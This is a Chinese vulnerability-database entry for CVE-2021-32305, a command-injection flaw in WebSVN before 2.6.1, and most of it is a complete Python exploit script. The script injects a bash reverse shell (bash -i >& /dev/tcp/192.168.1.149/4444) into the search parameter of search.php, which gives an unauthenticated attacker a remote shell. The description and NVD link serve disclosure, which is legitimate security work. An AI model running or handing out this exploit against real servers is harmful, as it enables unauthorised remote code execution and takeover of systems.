文章目录[隐藏]
websvn 安全漏洞
漏洞ID | 2450486 | 漏洞类型 | 操作系统命令注入 |
发布时间 | 2021-06-26 | 更新时间 | 2021-06-26 |
CVE编号 | CVE-2021-32305 | CNNVD-ID | CNNVD-202105-1210 |
漏洞平台 | N/A | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
websvn是一个应用软件。一个在线Subversion存储库浏览器。 WebSVN 2.6.1之前版本存在安全漏洞,该漏洞允许远程攻击者通过搜索参数中的shell元字符执行任意命令。
|漏洞EXP
# Exploit Title: Websvn 2.6.0 - Remote Code Execution (Unauthenticated)
# Date: 20/06/2021
# Exploit Author: g0ldm45k
# Vendor Homepage: https://websvnphp.github.io/
# Software Link: https://github.com/websvnphp/websvn/releases/tag/2.6.0
# Version: 2.6.0
# Tested on: Docker + Debian GNU/Linux (Buster)
# CVE : CVE-2021-32305
import requests
import argparse
from urllib.parse import quote_plus
PAYLOAD = "/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.149/4444 0>&1'"
REQUEST_PAYLOAD = '/search.php?search=";{};"'
parser = argparse.ArgumentParser(description='Send a payload to a websvn 2.6.0 server.')
parser.add_argument('target', type=str, help="Target URL.")
args = parser.parse_args()
if args.target.startswith("http://") or args.target.startswith("https://"):
target = args.target
else:
print("[!] Target should start with either http:// or https://")
exit()
requests.get(target + REQUEST_PAYLOAD.format(quote_plus(PAYLOAD)))
print("[*] Request send. Did you get what you wanted?")
|参考资料
来源:nvd.nist.gov
链接:https://nvd.nist.gov/vuln/detail/CVE-2021-32305
本文由 华域联盟 原创撰写:华域联盟 » websvn 安全漏洞
转载请保留出处和原文链接:https://www.cnhackhy.com/104030.htm